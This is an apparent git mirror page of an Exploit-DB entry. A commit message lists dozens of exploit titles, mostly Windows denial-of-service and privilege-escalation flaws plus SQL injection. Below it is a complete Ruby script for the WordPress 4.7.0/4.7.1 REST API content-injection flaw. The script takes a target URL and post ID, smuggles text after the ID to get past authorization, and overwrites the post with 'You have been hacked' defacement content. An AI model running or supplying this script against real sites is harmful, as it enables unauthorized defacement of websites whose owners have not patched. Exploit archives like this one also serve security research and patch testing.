bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/webapps/41224.rb
Offensive Security 8290029acb DB: 2017-02-03 
12 new exploits

Microsoft Windows 2000 - RPC DCOM Interface Denial of Service
Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service

Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit
Microsoft Windows Server 2003/XP - Samba Share Resource Exhaustion Exploit

Microsoft Windows 2000/XP - TCP Connection Reset Remote Attack Tool
Microsoft Windows Server 2000/XP - TCP Connection Reset Remote Attack Tool

Microsoft Windows 2003/XP - Remote Denial of Service
Microsoft Windows Server 2003/XP - Remote Denial of Service

Microsoft Windows 2003/XP - IPv6 Remote Denial of Service
Microsoft Windows Server 2003/XP - IPv6 Remote Denial of Service

Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak Denial of Service
Microsoft Windows Server 2000 - UPNP (getdevicelist) Memory Leak Denial of Service

Microsoft Windows 2003 - '.EOT' Blue Screen of Death Crash
Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash

Microsoft Windows 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)
Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)

Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service
Microsoft Windows Server 2000/2003/XP - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
Microsoft Windows Server 2000/2003/XP - 'win32k.sys' SfnINSTRING Local kernel Denial of Service

Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow
Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow

Microsoft Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service
Microsoft Windows Server 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service

NT 4.0 / Windows 2000 - TCP/IP Printing Service Denial of Service
Microsoft Windows Server 2000/NT 4.0 - TCP/IP Printing Service Denial of Service

Microsoft Windows 2000 - Telnet Server Denial of Service
Microsoft Windows Server 2000 - Telnet Server Denial of Service

Microsoft Windows 2000 - Telnet 'Username' Denial of Service
Microsoft Windows Server 2000 - Telnet 'Username' Denial of Service

Microsoft Windows 2000 - RunAs Service Denial of Service
Microsoft Windows Server 2000 - RunAs Service Denial of Service

Microsoft Windows 2000/NT - Terminal Server Service RDP Denial of Service
Microsoft Windows Server 2000/NT - Terminal Server Service RDP Denial of Service

Microsoft Windows 2000/XP - GDI Denial of Service
Microsoft Windows Server 2000/XP - GDI Denial of Service
Microsoft Windows 2000 - Internet Key Exchange Denial of Service (1)
Microsoft Windows 2000 - Internet Key Exchange Denial of Service (2)
Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (1)
Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (2)
Microsoft Windows 2000/NT 4 - TCP Stack Denial of Service (1)
Microsoft Windows 2000/NT 4 - TCP Stack Denial of Service (2)
Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (1)
Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (2)
Microsoft Windows 2000 - Lanman Denial of Service (1)
Microsoft Windows 2000 - Lanman Denial of Service (2)
Microsoft Windows Server 2000 - Lanman Denial of Service (1)
Microsoft Windows Server 2000 - Lanman Denial of Service (2)
Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)
Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)
Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)
Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)

Microsoft Windows 2000/2003/XP - Graphical Device Interface Library Denial of Service
Microsoft Windows Server 2000/2003/XP - Graphical Device Interface Library Denial of Service

Microsoft Windows 2000/XP - Internet Protocol Validation Remote Code Execution (1)
Microsoft Windows Server 2000/XP - Internet Protocol Validation Remote Code Execution (1)

Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)
Microsoft Windows Server 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)

Microsoft Windows 2000/2003/XP - CreateRemoteThread Local Denial of Service
Microsoft Windows Server 2000/2003/XP - CreateRemoteThread Local Denial of Service

Microsoft Windows 2000/XP - Registry Access Local Denial of Service
Microsoft Windows Server 2000/XP - Registry Access Local Denial of Service

Microsoft Windows 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities
Microsoft Windows Server 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities

Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service
Microsoft Windows Server 2003/XP - Explorer .WMF File Handling Denial of Service

Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service
Microsoft Windows Server 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service
Microsoft Windows 10 - SMBv3 Tree Connect (PoC)
Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption
Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)
Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)
Microsoft Windows Server 2003 - Token Kidnapping Local Exploit (PoC)
Microsoft Windows Server 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)

Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)
Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)

Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)
Microsoft Windows Server 2003/XP - 'afd.sys' Privilege Escalation (MS11-080)

Microsoft Windows 2000/95/98/NT 4.0 - Long Filename Extension
Microsoft Windows Server 2000/95/98/NT 4.0 - Long Filename Extension

Microsoft Windows 2000 - Named Pipes Predictability
Microsoft Windows Server 2000 - Named Pipes Predictability

Microsoft Windows 2000 - Still Image Service Privilege Escalation
Microsoft Windows Server 2000 - Still Image Service Privilege Escalation

Microsoft Windows 2000/NT 4 - DLL Search Path
Microsoft Windows Server 2000/NT 4 - DLL Search Path

Microsoft Windows 2000 - Debug Registers
Microsoft Windows Server 2000 - Debug Registers

Microsoft Windows 2000 - RunAs Service Named Pipe Hijacking
Microsoft Windows Server 2000 - RunAs Service Named Pipe Hijacking

Microsoft Windows 2000/NT 4 - NTFS File Hiding
Microsoft Windows Server 2000/NT 4 - NTFS File Hiding

Microsoft Windows 2000 / NT 4.0 - Process Handle Local Privilege Elevation
Microsoft Windows Server 2000/NT 4.0 - Process Handle Local Privilege Elevation
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (1)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (2)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (3)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (4)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (5)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (6)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (7)
Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (8)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (1)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (2)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (3)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (4)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (5)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (6)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (7)
Microsoft Windows Server 2000/NT 4/XP - Window Message Subsystem Design Error (8)
Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation (1)
Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation (2)
Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (1)
Microsoft Windows Server 2000/NT 4/XP - NetDDE Privilege Escalation (2)

Microsoft Windows 2000 - Help Facility .CNT File :Link Buffer Overflow
Microsoft Windows Server 2000 - Help Facility .CNT File :Link Buffer Overflow

Microsoft Windows 2000 - RegEdit.exe Registry Key Value Buffer Overflow
Microsoft Windows Server 2000 - RegEdit.exe Registry Key Value Buffer Overflow
Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation (1)
Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation (2)
Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (1)
Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2)

Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)
Microsoft Windows Server 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)

Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)
Microsoft Windows Server 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)

Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ)
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - Local Ring Exploit (EPATHOBJ)

Microsoft Windows 2000/2003/XP - Keyboard Event Privilege Escalation
Microsoft Windows Server 2000/2003/XP - Keyboard Event Privilege Escalation

Microsoft Windows 2003/XP - ReadDirectoryChangesW Information Disclosure
Microsoft Windows Server 2003/XP - ReadDirectoryChangesW Information Disclosure
Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Privilege Escalation
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation
Microsoft Windows Server 2003/2008/XP/Vista - WMI Service Isolation Privilege Escalation
Microsoft Windows Server 2003/XP - RPCSS Service Isolation Privilege Escalation

Microsoft Windows 2000/XP/2003 - Desktop Wall Paper System Parameter Privilege Escalation
Microsoft Windows Server 2000/2003/XP - Desktop Wall Paper System Parameter Privilege Escalation

Microsoft Windows 2000/XP/2003/Vista - Double-Free Memory Corruption Privilege Escalation
Microsoft Windows Server 2000/2003/XP/Vista - Double-Free Memory Corruption Privilege Escalation

Ghostscript 9.20 - 'Filename' Command Execution

Microsoft Windows 2000 - RSVP Server Authority Hijacking (PoC)
Microsoft Windows Server 2000 - RSVP Server Authority Hijacking (PoC)

Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit
Microsoft Windows Server 2000/XP - RPC Remote (Non Exec Memory) Exploit
Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)
Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)
Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (1)
Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (2)

Microsoft Windows 2000 - WINS Remote Code Execution
Microsoft Windows Server 2000 - WINS Remote Code Execution

Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)
Microsoft Windows Server 2003/XP - Metafile Escape() Code Execution (Metasploit)
WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Python)
WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Perl)
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl)

Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow

Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow (Windows 2000)
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow

Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
Microsoft Windows Server 2003/XP/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)

Microsoft Internet Explorer 5 (Windows 2000/95/98/NT 4) - XML HTTP Redirect
Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4) - XML HTTP Redirect

Microsoft Index Server 2.0 / Indexing Services (Windows 2000) - Directory Traversal
Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - Directory Traversal

Cat Soft Serv-U FTP Server 2.5/a/b (Windows 2000/95/98/NT 4.0) - Shortcut Exploit
Cat Soft Serv-U FTP Server 2.5/a/b (Windows 95/98/2000/NT 4.0) - Shortcut Exploit

Microsoft Windows 2000 - Remote CPU-overload
Microsoft Windows Server 2000 - Remote CPU-overload

Microsoft Windows 2000 - telnet.exe NTLM Authentication
Microsoft Windows Server 2000 - telnet.exe NTLM Authentication

Microsoft Indexing Services (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting
Microsoft Indexing Service (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting

Microsoft Indexing Services (Windows 2000) - File Verification
Microsoft Indexing Service (Windows 2000) - File Verification
SurfControl SuperScout WebFilter for windows 2000 - File Disclosure
SurfControl SuperScout WebFilter for windows 2000 - SQL Injection
Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow
SurfControl SuperScout WebFilter for Windows 2000 - File Disclosure
SurfControl SuperScout WebFilter for Windows 2000 - SQL Injection
Microsoft Windows Server 2000/NT 4/XP - Help Facility ActiveX Control Buffer Overflow

Microsoft Windows 2000 - Active Directory Remote Stack Overflow
Microsoft Windows Server 2000 - Active Directory Remote Stack Overflow

Microsoft Windows 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow
Microsoft Windows Server 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow

Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking
Microsoft Windows Server 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking
Microsoft Windows 2000/2003/XP - winhlp32 Phrase Integer Overflow
Microsoft Windows 2000/2003/XP - winhlp32 Phrase Heap Overflow
Microsoft Windows Server 2000/2003/XP - winhlp32 Phrase Integer Overflow
Microsoft Windows Server 2000/2003/XP - winhlp32 Phrase Heap Overflow

Microsoft Windows 2000/XP - Internet Protocol Validation Remote Code Execution (2)
Microsoft Windows Server 2000/XP - Internet Protocol Validation Remote Code Execution (2)
Microsoft Windows 2000/2003 - Recursive DNS Spoofing (1)
Microsoft Windows 2000/2003 - Recursive DNS Spoofing (2)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)

Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)
Travel Portal Script 9.33 - SQL Injection
Movie Portal Script 7.35 - SQL Injection
Itech Travel Portal Script 9.33 - SQL Injection
Itech Movie Portal Script 7.35 - SQL Injection

Auction Script 6.49 - SQL Injection
Itech Auction Script 6.49 - 'mcid' Parameter SQL Injection

Itech News Portal Script 6.28 - SQL Injection
Itech News Portal Script 6.28 - 'inf' Parameter SQL Injection

Video Sharing Script 4.94 - SQL Injection
Itech Video Sharing Script 4.94 - 'v' Parameter SQL Injection

Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection
Itech Classifieds Script 7.27 - SQL Injection

Video Sharing Script 4.94 - 'uid' Parameter SQL Injection
Itech Video Sharing Script 4.94 - SQL Injection
WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Python)
WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Ruby)
Itech Travel Portal Script 9.35 - SQL Injection
Property Listing Script - 'propid' Parameter Blind SQL Injection
Itech Inventory Management Software 3.77 - SQL Injection
Itech Movie Portal Script 7.37 - SQL Injection
Itech News Portal Script 6.28 - 'sc' Parameter SQL Injection
Itech Auction Script 6.49 - 'pid' Parameter SQL Injection
2017-02-03 05:01:17 +00:00

39 lines
No EOL
1 KiB
Ruby
Executable file
Raw Blame History

# Exploit Title: WP Content Injection
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: Backbox ubuntu Linux
# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Credits : Marc, Sucuri, Brute
# usage : gem install rest-client
# Lang : Ruby
require 'rest-client'
require 'json'
puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i
response = RestClient.post(
"#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
{
"id" => "#{postid}justrawdata",
"title" => "You have been hacked",
"content" => "Hacked please update your wordpress version"
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts "Done! '#{targeturi}/index.php?p=#{postid}'"
else
puts "This site is not Vulnerable"
end
Reference in a new issue View git blame Copy permalink